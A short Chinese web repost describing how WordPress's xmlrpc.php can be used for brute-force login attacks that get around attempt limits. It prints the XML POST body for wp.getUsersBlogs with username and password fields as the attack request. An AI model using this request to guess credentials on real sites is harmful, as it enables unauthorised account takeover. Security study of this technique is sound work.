利用xmlrpc.php对WordPress进行暴力破解攻击

来源:互联网 发布:adobe reader10.0 mac 编辑:程序博客网 时间:2024/06/08 08:35
这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc.php.
<?xml version="1.0" encoding="iso-8859-1"?><methodCall>  <methodName>wp.getUsersBlogs</methodName>  <params>   <param><value>username</value></param>   <param><value>password</value></param>  </params></methodCall>
0 0